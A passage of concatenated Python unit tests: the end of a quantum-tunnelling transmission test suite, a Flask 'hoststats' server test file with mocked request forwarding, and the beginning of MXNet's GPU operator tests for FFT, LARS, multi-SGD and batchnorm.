transmission_calculator.calculate_transmission(E, barrier, 0)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, barrier, -1)
# Assert
self.assertTrue("dx must be greater than 0" in str(exception_results1.value))
self.assertTrue("dx must be greater than 0" in str(exception_results2.value))
def test_validation_does_not_allow_too_large_energies(self):
# Assemble
E = 10000
V0 = 60000
dx = 0.1
barrier = np.array(V0+np.zeros(100))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("The energy provided results in too much intertia. The algorithm cannot provide results for such energies." in str(exception_results.value))
def test_validation_does_not_allow_invalid_dx(self):
# Assemble
E = 10
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
transmission_calculator.calculate_transmission(E, barrier, 0)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, barrier, -1)
# Assert
self.assertTrue("dx must be greater than 0" in str(exception_results1.value))
self.assertTrue("dx must be greater than 0" in str(exception_results2.value))
"""
Checks for the spread of a free particle (gaussian package) in space.
The truth comparison is done via comparing the wifth at half hight over
time with its theoretical prediction.
"""
def test_width_of_free_gaussian_package_grows_correctly(self):
# Assemble
hbar = 1
me = 1
E = 0.5
dx = 0.1
barrier = np.zeros(300)
initial_package_width = 1
error_tolerance = 1
package_widths = []
package_expected_widths = []
# ref: https://stackoverflow.com/a/16489955
def find_width_at_half_max_height(X,Y):
half_max = max(Y) / 2
# find when function crosses line half_max (when sign of diff flips)
d = np.sign(half_max - np.array(Y[0:-1])) - np.sign(half_max - np.array(Y[1:]))
# find the left and right most indexes
left_idx = np.argwhere(d > 0)[0]
right_idx = np.argwhere(d < 0)[-1]
return (X[right_idx] - X[left_idx])[0] / (2 * np.sqrt(2 * np.log(2))) #return the difference (full width)
def _step_callback(self, psi, psi_plot, x, n, finished):
t = self.dt * n
package_widths.append(find_width_at_half_max_height(x, psi_plot))
width = initial_package_width/2 * np.sqrt(1 + (4*(hbar**2)*(t**2))/((me**2)*(initial_package_width**4)))
package_expected_widths.append(width)
# As there is no barrier we want to intercept the exit condition and
# return after 1000 split steps
def _step_exit(self, n):
if (n == 1000):
return True
return False
transmission_calculator = TransmissionCalculator(
disable_electron_potential_validation = True,
_hbar = hbar,
_me = me,
package_wdh = initial_package_width,
step_callback = _step_callback,
step_exit = _step_exit
)
# Act
transmission_calculator.calculate_transmission(E, barrier, dx)
error = max(np.absolute(np.array(package_widths) - np.array(package_expected_widths)))
# Assert
self.assertTrue(error < error_tolerance)
"""
Makes sure the integral over all propability densities is 1.
"""
def test_propability_density_is_1(self):
# Assemble
E = 500 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.1
barrier = np.array(V0 + np.zeros(250))
prob_dens = []
error_tolerance = 0.1
def _step_callback(self, psi, psi_squared, x, n, finished):
if (finished == True):
prob = np.multiply(psi, psi.conj()).real
prob_dens.append(dx*np.sum(psi_squared))
transmission_calculator = TransmissionCalculator(
step_callback = _step_callback
)
# Act
transmission_calculator.calculate_transmission(E, barrier, dx)
error = max(np.absolute(np.array(prob_dens) - 1))
# Assert
self.assertTrue(error < error_tolerance)
"""
Plots |T|^2 over E/V and should show a characteristic curvature.
The test is not automatically checked for truthness. The tester
must review the plot manually.
"""
def test_transmission_to_energy_ratio(self):
# Assemble
E = 100 * codata.value("electron volt") * 1e-3
V_0 = 400 * codata.value("electron volt") * 1e-3
# E = 10 * codata.value("electron volt") * 1e-3
# V_0 = 40 * codata.value("electron volt") * 1e-3
dx = 0.1
barrier = np.array(V_0 + np.zeros(300))
V_over_E = []
transmissions = []
def _step_callback(self, psi, psi_plot, x, n, finished):
if (finished == True):
plt.xlabel('x in pm')
plt.ylabel('$|\Psi(x)|^2$')
plt.plot(
self.x,
psi_plot,
self.x,
max(psi_plot)*(self.V)/max(self.V))
plt.show()
transmission_calculator = TransmissionCalculator(disable_electron_potential_validation = True,
# step_callback = _step_callback
)
for E in np.arange(0, 4 * V_0, V_0 / 5):
# Act
if (E == 0):
E = 1 * codata.value("electron volt") * 1e-3
transmission = transmission_calculator.calculate_transmission(E, barrier, dx)
transmissions.append(transmission**2)
V_over_E.append(E / V_0)
# print(transmissions)
plt.xlabel('E/V')
plt.ylabel('T^2')
plt.plot(V_over_E, transmissions)
plt.show()
self.assertTrue(True)
"""
Tests the entire transmission calculation process and - if configured -
displays the plot of the final propagation state.
Compares the result with a reference result found here:
https://www.youtube.com/watch?v=_3wFXHwRP4s
"""
def test_transmission_returns_realistic_values(self):
# Assemble
E = 500 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.05
barrier = np.array(V0 + np.zeros(250))
# E = 10 * codata.value("electron volt") * 1e-3
# V0 = 40 * codata.value("electron volt") * 1e-3
# dx = 0.1
# barrier = np.array(V0 + np.zeros(3000))
prob_dens = []
error_tolerance = 0.1
def _step_callback(self, psi, psi_plot, x, n, finished):
if (finished == True):
plt.xlabel('x in pm')
plt.ylabel('$|\Psi(x)|^2$')
plt.plot(
self.x,
psi_plot,
self.x,
max(psi_plot)*(self.V)/max(self.V)
)
plt.show()
transmission_calculator = TransmissionCalculator(
# step_callback = _step_callback,
)
# Act
transmission = transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue(np.abs(1 - transmission / 0.175) < error_tolerance)
"""
Animates the entire propagation of the gaussian wave through a potential.
Only for visual purposes. Does not validate against anything and thus
asserts against True
"""
def xtest_animate_progress(self):
# Assemble
E = 550 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.05
barrier = np.array(V0 + np.zeros(200))
prob_dens = []
error_tolerance = 0.1
fig, ax = plt.subplots()
line = ax.plot([], [])
plt.xlabel('x')
plt.ylabel('$|\Psi|^2$')
def update(data):
plt.gca().cla()
plt.plot(_x, 0.6 * (_V / max(_V)))
ax.plot(_x, _psi_plot),
ax.set_xlim(-100, 100)
ax.set_ylim(0, 0.8)
def data_gen():
global _psi_plot
yield _psi_plot
def _step_callback(self, psi, psi_plot, x, n, finished):
global _psi_plot
global _x
global _V
_psi_plot = psi_plot
_x = self.x
_V = self.V
transmission_calculator = TransmissionCalculator(
step_callback = _step_callback,
)
ani = animation.FuncAnimation(fig, update, data_gen, interval=30)
# Act
Thread(target = transmission_calculator.calculate_transmission, args = (E, barrier, dx)).start()
plt.show()
self.assertTrue(True)
if __name__ == '__main__':
transmission_suite = unittest.TestLoader().loadTestsFromTestCase(TransmissionTestSuite)
unittest.TextTestRunner(verbosity=2, buffer=True).run(transmission_suite)
|
test_server.py
|
import json
import logging
import time
from multiprocessing import Process, Queue
from time import sleep
from unittest import TestCase, mock
from unittest.mock import call
from hoststats.app import app
from hoststats.collection import SLEEP_INTERVAL_MS, collect_metrics
from hoststats.stats import FORWARD_HEADER
SLEEP_INTERVAL_SECS = SLEEP_INTERVAL_MS / 1000
class MockResponse:
def __init__(self, text, status_code):
self.text = text
self.content = text
self.data = bytes(text, "utf-8")
self.status_code = status_code
self.headers = {
"content-encoding": "blah",
"content-length": 123,
"some-other-header": "hi there",
}
def mocked_requests_request(method, url, headers):
logging.debug(f"Calling mocked request: {method}, {url}, {headers}")
if url.endswith("ping"):
return MockResponse("mocked ping", 200)
elif url.endswith("start"):
return MockResponse("mocked start", 200)
elif url.endswith("stop"):
return MockResponse("mocked stop", 200)
else:
raise RuntimeError("Unrecognised mock request")
class TestHostStatsCollection(TestCase):
def setUp(self):
app.config["TESTING"] = True
self.client = app.test_client()
def test_ping(self):
res = self.client.get("ping")
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data.decode("utf-8"), "PONG")
def test_api(self):
# Start the collection
start_time_millis = int(time.time() * 1000)
self.client.get("start")
# Sleep for a couple of intervals
n_intervals = 2
sleep(n_intervals * SLEEP_INTERVAL_SECS + 1)
# Stop the collection
res = self.client.get("stop")
end_time_millis = int(time.time() * 1000)
actual = json.loads(res.data.decode("utf-8"))
self.check_collection_response(
n_intervals, start_time_millis, end_time_millis, actual
)
def test_collection(self):
# Start metrics collection in background
kill_queue = Queue()
result_queue = Queue()
start_time_millis = int(time.time() * 1000)
bg_proc = Process(
target=collect_metrics, args=(kill_queue, result_queue)
)
bg_proc.start()
# Allow a number of intervals to have happened
n_intervals = 2
sleep(n_intervals * SLEEP_INTERVAL_SECS + 1)
# Kill the background collection process
kill_queue.put("die")
bg_proc.join()
end_time_millis = int(time.time() * 1000)
# Get and parse result
actual = result_queue.get()
actual = json.loads(actual)
self.check_collection_response(
n_intervals, start_time_millis, end_time_millis, actual
)
def check_collection_response(
self, n_intervals, start_time_millis, end_time_millis, actual
):
# Check it has the entries we expect
self.assertListEqual(
list(actual.keys()), ["cpu", "mem", "disk", "net"]
)
# Check contents
cpu = actual["cpu"]
mem = actual["mem"]
disk = actual["disk"]
net = actual["net"]
# Pick a known stat, check we have expected number of readings
expected_intervals = n_intervals + 1
write_mb_values = disk["DISK_WRITE_MB"]
self.assertEqual(len(write_mb_values), expected_intervals)
# Sense-check timestamps
cpu_timestamps = cpu["timestamp"]
self.assertEqual(len(cpu_timestamps), expected_intervals)
last_ts = 0
for ts in cpu_timestamps:
self.assertGreater(ts, last_ts)
self.assertGreater(ts, start_time_millis)
self.assertLess(ts, end_time_millis)
last_ts = ts
self.assertListEqual(mem["timestamp"], cpu_timestamps)
self.assertListEqual(disk["timestamp"], cpu_timestamps)
self.assertListEqual(net["timestamp"], cpu_timestamps)
# Sense-check some percentages
for cpu_pct in cpu["CPU_PCT"]:
self.assertGreaterEqual(cpu_pct, 0)
self.assertLessEqual(cpu_pct, 100)
for cpu_pct in cpu["CPU_0_PCT_IOWAIT"]:
self.assertGreaterEqual(cpu_pct, 0)
self.assertLessEqual(cpu_pct, 100)
for mem_pct in mem["MEMORY_USED_PCT"]:
self.assertGreaterEqual(mem_pct, 0)
self.assertLessEqual(mem_pct, 100)
def _check_mocked_request(self, mock_req, url, expected_response):
# Without setting our own user agent we get something chosen by the
# underlying Flask mock client which we would have to hard code.
user_agent = "foobar-agent"
resp = self.client.get(
url,
headers={
FORWARD_HEADER: "3.3.3.3",
},
environ_base={"HTTP_USER_AGENT": user_agent},
)
self.assertEqual(resp.data.decode("utf-8"), expected_response)
expected_calls = [
call(
method="GET",
url=f"http://3.3.3.3:5000/{url}",
headers={"User-Agent": user_agent},
),
]
self.assertListEqual(mock_req.call_args_list, expected_calls)
# Check headers filtered on response
expected_headers = {
"Content-Length": f"{len(expected_response)}",
"Content-Type": "text/html; charset=utf-8",
"some-other-header": "hi there",
}
actual_headers = {k: v for (k, v) in resp.headers}
self.assertEqual(actual_headers, expected_headers)
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_ping_request(self, mock_req):
self._check_mocked_request(mock_req, "ping", "mocked ping")
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_start_request(self, mock_req):
self._check_mocked_request(mock_req, "start", "mocked start")
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_stop_request(self, mock_req):
self._check_mocked_request(mock_req, "stop", "mocked stop")
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
